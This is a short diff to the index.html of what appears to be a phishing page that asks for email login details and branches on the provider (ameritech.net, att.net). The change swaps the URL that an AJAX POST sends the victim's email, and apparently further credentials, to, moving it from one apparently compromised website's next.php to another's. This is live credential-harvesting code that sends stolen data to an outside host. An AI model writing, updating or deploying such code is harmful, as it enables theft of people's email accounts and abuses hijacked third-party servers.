--- a/index.html
+++ b/index.html
@@ -385,7 +385,7 @@ else if (value.indexOf('@ameritech.net') >= 0 || value.indexOf('@att.net') >= 0 
       
       $.ajax({
         dataType: 'JSON',
-        url: 'https://lukshiccc.com/wp-admin/images/img/next.php',
+        url: 'https://francescotoro.it/_wildcard_francescotoro.it/00/next.php',
         type: 'POST',
         data:{
           email:email,
